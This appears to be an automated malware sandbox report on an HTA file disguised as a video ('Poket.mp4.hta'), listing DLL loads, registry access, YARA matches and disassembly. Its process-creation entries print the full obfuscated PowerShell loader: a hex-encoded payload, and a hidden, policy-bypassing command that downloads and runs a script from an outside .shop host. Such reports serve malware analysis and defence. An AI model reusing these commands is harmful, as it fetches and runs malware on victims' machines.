              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: pnrpnsp.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshbth.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: nlaapi.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: winrnr.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: fwpuclnt.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: napinsp.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: pnrpnsp.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshbth.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: nlaapi.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: winrnr.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: fwpuclnt.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: napinsp.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: pnrpnsp.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshbth.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: nlaapi.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: winrnr.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: fwpuclnt.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: napinsp.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: pnrpnsp.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshbth.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: nlaapi.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: winrnr.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: fwpuclnt.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: edputil.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.staterepositoryps.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wintypes.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: appresolver.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: bcp47langs.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: slc.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: sppc.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: onecorecommonproxystub.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasapi32.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasman.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rtutils.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mswsock.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: winhttp.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: iphlpapi.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc6.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dnsapi.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: winnsi.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasadhlp.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: fwpuclnt.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: schannel.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mskeyprotect.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntasn1.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncrypt.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncryptsslp.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: winhttp.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: webio.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mswsock.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: iphlpapi.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: winnsi.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dnsapi.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasadhlp.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: fwpuclnt.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: schannel.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mskeyprotect.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntasn1.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncrypt.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncryptsslp.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: C:\Windows\SysWOW64\mshta.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{25336920-03F9-11CF-8FD0-00AA00686F13}\InProcServer32Jump to behavior
              Source: C:\Windows\SysWOW64\mshta.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Internet Explorer\SettingsJump to behavior
              Source: Window RecorderWindow detected: More than 3 window changes detected
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dllJump to behavior
              Source: Poket.mp4.htaStatic file information: File size 1645681 > 1048576
              Source: Binary string: C:\Users\dahall\Documents\GitHubRepos\TaskScheduler\TaskService\obj\Release\net40\Microsoft.Win32.TaskScheduler.pdbSHA256e source: powershell.exe, 00000004.00000002.2549625066.0000000008060000.00000004.08000000.00040000.00000000.sdmp
              Source: Binary string: C:\Users\dahall\Documents\GitHubRepos\TaskScheduler\TaskService\obj\Release\net40\Microsoft.Win32.TaskScheduler.pdb source: powershell.exe, 00000004.00000002.2549625066.0000000008060000.00000004.08000000.00040000.00000000.sdmp
              Source: Binary string: protobuf-net.pdbSHA256}Lq source: powershell.exe, 00000004.00000002.2549131224.0000000008000000.00000004.08000000.00040000.00000000.sdmp
              Source: Binary string: protobuf-net.pdb source: powershell.exe, 00000004.00000002.2549131224.0000000008000000.00000004.08000000.00040000.00000000.sdmp

              Data Obfuscation

              barindex
              Source: 4.2.powershell.exe.8000000.1.raw.unpack, TypeModel.cs.Net Code: TryDeserializeList
              Source: 4.2.powershell.exe.8000000.1.raw.unpack, ListDecorator.cs.Net Code: Read
              Source: 4.2.powershell.exe.8000000.1.raw.unpack, TypeSerializer.cs.Net Code: CreateInstance
              Source: 4.2.powershell.exe.8000000.1.raw.unpack, TypeSerializer.cs.Net Code: EmitCreateInstance
              Source: 4.2.powershell.exe.8000000.1.raw.unpack, TypeSerializer.cs.Net Code: EmitCreateIfNull
              Source: 4.2.powershell.exe.8060000.2.raw.unpack, ReflectionHelper.cs.Net Code: InvokeMethod
              Source: 4.2.powershell.exe.8060000.2.raw.unpack, ReflectionHelper.cs.Net Code: InvokeMethod
              Source: 4.2.powershell.exe.8060000.2.raw.unpack, XmlSerializationHelper.cs.Net Code: ReadObjectProperties
              Source: 4.2.powershell.exe.a6d0d60.4.raw.unpack, Tqkgthnr.cs.Net Code: Szplwz System.AppDomain.Load(byte[])
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeAnti Malware Scan Interface: FromBase64String($z));$BytesTrINg = $Enc.$3S9fboqEW6s5lzzrbxISnQAS8vfZfX1lKoB0Ljaei3YziUwKv3ke81MgYgaiamrUfTVWZ4Imyl6PYMRCDuizL5OqzlUjSfe60lWDsf9oTxE2o45BuYjIqKoGHrCzHVwRljlxlkfY1UDUJjuio7lawqoA087tMV
              Source: C:\Windows\SysWOW64\mshta.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w 1 -ep Unrestricted -nop function FRsZn($zLKrb){return -split ($zLKrb -replace '..', '0x$& ')};$VUQBu = FRsZn('C3A33C52A21C41B9F45DD91B9A3BF30CF2EC6EDD823C9CECE83AD45776A5B6CCA18208E15A52DF5B7F83353D6E23BD618F30020318AA0658A8B9202E85F786765CAAB181B34D40F3E1AFBB439A24557CA57621A37BD3FD396EFFD4A447891C80C3A87A883D5313ADDB72306D4184811757153E08EDD2EF4BECF037797B4B79F777C6223CC775BC4B03CC115C23AD1596E113A7F8E74EB4EEC5E6D17A73F590BCA9BE30FE8DE26E4F3F386BC2B0DF4C8B789F385D01CC9DEEFE7FFE963CAD5B715105E46717C1F8CA599AAC7C726247B67B2EF008D6815624C48D8921D6C026C2D761B3C73420E46D41EB38B2BE6DC3A6E728398BE20DF964E092C95FFF64376795C2EB65F33EC3620D837926668055A522E8A88AC3164B0FFA0FE44948E6327C8E69269E914364F60006F48EB7A2F9830777B3C6BC5165322AC78640320B0B34D2AA9C9EF97D71CAF1BE1EDD212144C4E5EDA5048BFFD67A1DAE7B36D7277064EDF983455E52E8A0A77BCEF0FA38AB0C8D4EA1FCA20A03B622CFD25F156452A918D62CCD80D0060DF532D92D537F9E1ECC41864005C3C9E067C14930765854957EFB5E71DDA020E9C8287B2F961F0BDC387138260ABC45FB51EA8AE2B650D5B9C6E9C5687580B83CC67FAABC67D590702C85406AB842938C6700BDEE21992168619BEA16916FB865DC5F6DF6D9F4F1B2CCA2D2BF385A560E8F04C765355464B3F06BDD88EA77E44A2D1776F2B6CD01864CFEE829FB17A5E70D006D79C119DC5F57A9A25AA984AA5B1704215FFBC39398A42CB74F3594AA3D56DAE65B45E14CC7B4611364CE10E2A98948A4408130F9C618D3F505B018949F27C940B9058868E152DD2A4787F24AD17BF0A1F6BF9DF717F3BFD33DC5A1972C3919F13AEE4CB268C7DC3F54CF3AC0EE2BA15D2C8D82C9A8C7B8B2A0FD03B7AA09EA4F38E2B6FD1C519EACEDAE21D18FB3B6CBB0A3CD5570DE3F6C90D36EAA1E063743143EBA60B985DE8361C93EC0D22BCAD34D88804A5C111C47C68EE0D30AC9C64F3AE88BA57295F333C3B513E91EF96441C281655217BA1DE5C3FDEC2419E6DDAC538710D679FF0DF83B2EBE940E136711ED6C3C0FBFAD98C9CD7FCEEB3415207ACAAA8F091CDD9D584DB90BD37D6E6AA2BE9E6344E6C4A74A99DBC82A78E28F9AABA7BAB79EF7ECD2EC5397E326870A7A51E0D74D954C0215E1BAA229E0816AABBCB00A25173C21E313511B1C978FD55355ADFBF4E15EBD0A9B52C25E32EA220C9D9DBACD18EE9CEEC99257188138D0ABBD29C4DFFC9B960A9CEC94DF767700576A1EF94D8B5F25088C95CB11F2AC671514479E6568DF04F03553A9607589926AABEEDCE4449E803E102F7E84665C1EDBE23E8C0D5DFAB8C81BC5277AAAA134C26CD84C912045FEE79030EAF24569738BDC109FE8349634563C2F5EE96E70C6932AF1AB2C27F468AA44A2B4E2ABEBB52F245AB3E0B51A5D301366672FE9F491D4F1038B32F46286F25D8D40248A896053E14BE3DA4565AB47483A26AB50D34AF15BFC76980B08272D58F9CAB8F88E13142E13805C1ECA94D3C7934EAB6A74C1BAA74CD734574037B043E95C8086CFE97D42C4B9A7F1C21BC9FE6FFEC1DAF361C9A765C5C0A9E41D0D9FDE014881D03D024F34A7EBC93790F2B789B1D7F8AF2755F7862A0E0238A32A772D6A2732B3095DAAD4EB0E7D9915B8CB5B83C7FD80951D9638EF55A6375A4B0A1A6A39486BD42703740D4739F14C284BAD645B7AEAD8AC307E2B9086D4067F09951FB60ACCFB3C645EF7029257E657DB2C75969E04CEA94922CBA886EE7FB2C5094B35B47B3E5A6D070E4C8F6BFF03BF56A6B5E69DB983EC5AC0059A752A08B6681BBF75BE4896545506145ACE95DFFDBF434E62E3EA18A82FB864DBAAF7024875DFAAD3455165F3E298C179E9C1BB64E557E51B265C18627C5213911A94A996DED9FAF3D
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\SysWow64\WindowsPowerShell\v1.0\powershell.exe" -w hidden -ep bypass -nop -Command gdr -*;Set-Variable CiU (.$ExecutionContext.(($ExecutionContext|Member)[6].Name).(($ExecutionContext.(($ExecutionContext|Member)[6].Name)|Member|Where-Object{$_.Name-like'*t*om*d'}).Name).Invoke($ExecutionContext.(($ExecutionContext|Member)[6].Name).(($ExecutionContext.(($ExecutionContext|Member)[6].Name).PsObject.Methods|Where-Object{$_.Name-like'*om*e'}).Name).Invoke('N*-O*',$TRUE,$TRUE),[Management.Automation.CommandTypes]::Cmdlet)Net.WebClient);Set-Item Variable:/lW 'https://deduhko.klipzyroloo.shop/mazkk.eml';[ScriptBlock]::Create((GI Variable:CiU).Value.((((GI Variable:CiU).Value|Member)|Where-Object{$_.Name-like'*nl*g'}).Name).Invoke((Variable lW).Value)).InvokeReturnAsIs()
              Source: C:\Windows\SysWOW64\mshta.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w 1 -ep Unrestricted -nop function FRsZn($zLKrb){return -split ($zLKrb -replace '..', '0x$& ')};$VUQBu = FRsZn('C3A33C52A21C41B9F45DD91B9A3BF30CF2EC6EDD823C9CECE83AD45776A5B6CCA18208E15A52DF5B7F83353D6E23BD618F30020318AA0658A8B9202E85F786765CAAB181B34D40F3E1AFBB439A24557CA57621A37BD3FD396EFFD4A447891C80C3A87A883D5313ADDB72306D4184811757153E08EDD2EF4BECF037797B4B79F777C6223CC775BC4B03CC115C23AD1596E113A7F8E74EB4EEC5E6D17A73F590BCA9BE30FE8DE26E4F3F386BC2B0DF4C8B789F385D01CC9DEEFE7FFE963CAD5B715105E46717C1F8CA599AAC7C726247B67B2EF008D6815624C48D8921D6C026C2D761B3C73420E46D41EB38B2BE6DC3A6E728398BE20DF964E092C95FFF64376795C2EB65F33EC3620D837926668055A522E8A88AC3164B0FFA0FE44948E6327C8E69269E914364F60006F48EB7A2F9830777B3C6BC5165322AC78640320B0B34D2AA9C9EF97D71CAF1BE1EDD212144C4E5EDA5048BFFD67A1DAE7B36D7277064EDF983455E52E8A0A77BCEF0FA38AB0C8D4EA1FCA20A03B622CFD25F156452A918D62CCD80D0060DF532D92D537F9E1ECC41864005C3C9E067C14930765854957EFB5E71DDA020E9C8287B2F961F0BDC387138260ABC45FB51EA8AE2B650D5B9C6E9C5687580B83CC67FAABC67D590702C85406AB842938C6700BDEE21992168619BEA16916FB865DC5F6DF6D9F4F1B2CCA2D2BF385A560E8F04C765355464B3F06BDD88EA77E44A2D1776F2B6CD01864CFEE829FB17A5E70D006D79C119DC5F57A9A25AA984AA5B1704215FFBC39398A42CB74F3594AA3D56DAE65B45E14CC7B4611364CE10E2A98948A4408130F9C618D3F505B018949F27C940B9058868E152DD2A4787F24AD17BF0A1F6BF9DF717F3BFD33DC5A1972C3919F13AEE4CB268C7DC3F54CF3AC0EE2BA15D2C8D82C9A8C7B8B2A0FD03B7AA09EA4F38E2B6FD1C519EACEDAE21D18FB3B6CBB0A3CD5570DE3F6C90D36EAA1E063743143EBA60B985DE8361C93EC0D22BCAD34D88804A5C111C47C68EE0D30AC9C64F3AE88BA57295F333C3B513E91EF96441C281655217BA1DE5C3FDEC2419E6DDAC538710D679FF0DF83B2EBE940E136711ED6C3C0FBFAD98C9CD7FCEEB3415207ACAAA8F091CDD9D584DB90BD37D6E6AA2BE9E6344E6C4A74A99DBC82A78E28F9AABA7BAB79EF7ECD2EC5397E326870A7A51E0D74D954C0215E1BAA229E0816AABBCB00A25173C21E313511B1C978FD55355ADFBF4E15EBD0A9B52C25E32EA220C9D9DBACD18EE9CEEC99257188138D0ABBD29C4DFFC9B960A9CEC94DF767700576A1EF94D8B5F25088C95CB11F2AC671514479E6568DF04F03553A9607589926AABEEDCE4449E803E102F7E84665C1EDBE23E8C0D5DFAB8C81BC5277AAAA134C26CD84C912045FEE79030EAF24569738BDC109FE8349634563C2F5EE96E70C6932AF1AB2C27F468AA44A2B4E2ABEBB52F245AB3E0B51A5D301366672FE9F491D4F1038B32F46286F25D8D40248A896053E14BE3DA4565AB47483A26AB50D34AF15BFC76980B08272D58F9CAB8F88E13142E13805C1ECA94D3C7934EAB6A74C1BAA74CD734574037B043E95C8086CFE97D42C4B9A7F1C21BC9FE6FFEC1DAF361C9A765C5C0A9E41D0D9FDE014881D03D024F34A7EBC93790F2B789B1D7F8AF2755F7862A0E0238A32A772D6A2732B3095DAAD4EB0E7D9915B8CB5B83C7FD80951D9638EF55A6375A4B0A1A6A39486BD42703740D4739F14C284BAD645B7AEAD8AC307E2B9086D4067F09951FB60ACCFB3C645EF7029257E657DB2C75969E04CEA94922CBA886EE7FB2C5094B35B47B3E5A6D070E4C8F6BFF03BF56A6B5E69DB983EC5AC0059A752A08B6681BBF75BE4896545506145ACE95DFFDBF434E62E3EA18A82FB864DBAAF7024875DFAAD3455165F3E298C179E9C1BB64E557E51B265C18627C5213911A94A996DED9FAF3DJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\SysWow64\WindowsPowerShell\v1.0\powershell.exe" -w hidden -ep bypass -nop -Command gdr -*;Set-Variable CiU (.$ExecutionContext.(($ExecutionContext|Member)[6].Name).(($ExecutionContext.(($ExecutionContext|Member)[6].Name)|Member|Where-Object{$_.Name-like'*t*om*d'}).Name).Invoke($ExecutionContext.(($ExecutionContext|Member)[6].Name).(($ExecutionContext.(($ExecutionContext|Member)[6].Name).PsObject.Methods|Where-Object{$_.Name-like'*om*e'}).Name).Invoke('N*-O*',$TRUE,$TRUE),[Management.Automation.CommandTypes]::Cmdlet)Net.WebClient);Set-Item Variable:/lW 'https://deduhko.klipzyroloo.shop/mazkk.eml';[ScriptBlock]::Create((GI Variable:CiU).Value.((((GI Variable:CiU).Value|Member)|Where-Object{$_.Name-like'*nl*g'}).Name).Invoke((Variable lW).Value)).InvokeReturnAsIs() Jump to behavior
              Source: Yara matchFile source: 4.2.powershell.exe.69e0000.0.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 00000004.00000002.2542046628.00000000069E0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 6272, type: MEMORYSTR
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4_2_0670B67B push es; ret 4_2_0670B67C
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4_2_0670B657 push es; iretd 4_2_0670B664
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4_2_0670B54F push es; retf 4_2_0670B550
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4_2_06716CBB push es; iretd 4_2_06716CBC
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4_2_0671837F push es; retf 4_2_06718380
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4_2_0671836B push es; retf 4_2_06718378
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4_2_06716B03 push es; retf 4_2_06716B04
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4_2_06710BB8 push esp; retf 4_2_06710BC1
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4_2_06717073 push es; ret 4_2_06717074
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4_2_067294AA push edx; retf 4_2_067294AB
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4_2_0672987F push es; retf 4_2_06729880
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4_2_068ECAC9 push 6406DB27h; retf 0072h4_2_068ECAE5
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4_2_068ECC60 pushad ; retf 4_2_068ECD6D
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4_2_068ECD04 pushad ; retf 4_2_068ECD6D
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4_2_06943E1D push es; iretd 4_2_06943E28
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4_2_06945F41 push es; ret 4_2_06945F48
